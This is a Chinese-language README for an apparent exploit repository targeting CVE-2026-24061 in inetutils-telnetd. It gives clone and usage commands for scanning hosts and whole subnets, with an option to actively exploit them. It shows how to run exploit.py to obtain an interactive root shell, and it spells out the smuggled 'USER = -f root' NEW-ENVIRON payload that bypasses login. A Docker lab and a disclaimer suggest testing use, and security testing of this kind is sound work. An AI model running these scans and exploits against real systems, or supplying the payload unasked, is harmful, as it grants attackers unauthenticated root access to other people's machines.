👨💻 作者: Furkan KAYAPINAR (@FurkanKAYAPINAR)
本仓库包含一个针对 CVE-2026-24061 的漏洞扫描器和一个交互式利用工具。该漏洞影响 inetutils-telnetd(以及其他潜在的 Telnet 实现),原因是其对 NEW-ENVIRON Telnet 选项的处理不当,允许通过 -f root 载荷实现远程预认证访问。
--exploit 标志,用于验证 RCE。inetutils-telnetd 版本,用于安全测试。确保已安装 Python 3.x。
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## 使用方法
扫描目标是否存在 NEW-ENVIRON 漏洞。
# 扫描单个目标
python3 scanner.py -t 192.168.1.100 -p 1903
# 扫描子网
python3 scanner.py -s 192.168.1.0/24 -p 1903
# 扫描 IP 列表并尝试主动利用(RCE 检查)
python3 scanner.py -l ips.txt -p 1903 --exploit
获取交互式 root shell 访问权限。
python3 exploit.py -t 127.0.0.1 -p 1903
部署本地易受攻击的环境进行测试:
cd lab
docker-compose up -d --build
该漏洞在 Telnet 协商阶段被触发。通过使用特制的 IS VAR "USER" VALUE "-f root" 子协商数据包响应服务器的 DO NEW-ENVIRON 请求,服务端的 telnetd 进程会被欺骗,将 -f root 标志传递给 login 进程,从而绕过身份验证。
[!WARNING]
此工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是非法且不道德的行为。